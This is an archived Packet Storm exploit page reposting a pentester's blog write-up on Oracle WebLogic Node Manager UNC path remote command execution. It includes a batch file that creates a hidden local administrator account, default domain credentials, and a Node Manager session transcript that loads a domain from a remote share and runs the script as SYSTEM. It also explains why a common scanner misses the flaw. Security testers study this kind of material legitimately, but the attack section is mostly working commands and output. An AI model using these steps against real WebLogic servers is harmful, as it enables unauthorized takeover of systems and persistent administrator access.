exploit the possibilities

Oracle Web Logic Node Manager UNC Path Remote File Execution

Oracle Web Logic Node Manager UNC Path Remote File Execution
Posted Mar 20, 2012
Authored by Darren McDonald

This advisory documents the Oracle Web Logic Node Manager UNC path remote file execution exploitation details.

tags | exploit, remote, web
MD5 | 0397cdbf0f4b9e0235c45f6b90d0137c

Oracle Web Logic Node Manager UNC Path Remote File Execution

Change Mirror Download
Oracle Web Logic Node Manager UNC Path Remote File Execution
Posted by admin on 2012/03/16 Leave a comment (0) Go to comments

Keep running into old Web Logic installations which have the file traversal (http://www.securityfocus.com/bid/37926/info) and UNC path remote command execution (http://www.kb.cert.org/vuls/id/924300) vulns in them.

The file traversal one is rubbish as you can’t specify any command line arguments AFAIK (Do tell me if I’m wrong, please).

The UNC one requires you have a web logic domain accessible via a UNC path. Too much of a pain in the arse to do in middle of a test. Could not find one online, so I downloaded an older version of web logic, and setup a little wl domain with a little batch file to run the following…

@ECHO OFF

net user /add wlcetest WLCETest99*
net localgroup administrators /add wlcetest

The username and password for the wl domain is weblogic / w3bl0g1c.

Download it here. It’s for 10.3.2, no idea if it’ll work on other versions of WebLogic.

Here it is in action..

user@host:~$ openssl s_client -connect 192.168.0.1:5556
CONNECTED(00000003)
<snip>

hello
+OK Node manager v10.3 started
domain cetest1 \\192.168.0.2\share
+OK Current domain set to ‘cetest1′
execscript addlocaladmin.bat
+OK Script ‘addlocaladmin.bat’ executed

Add and modify the batch scripts in bin/service_migration/ to execute any commands you like as local system.

Typically, Nessus doesnt pick the UNC issue up, nor does it pick up the file traversal one if the domain directory structure is sitting on a driver letter other than C:\. This is because its file traversal technique can’t find ..\..\..\..\..\..\windows\system32\ipconfig.exe on D:\ E:\ Z:\ or whatever, which is its test case.


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close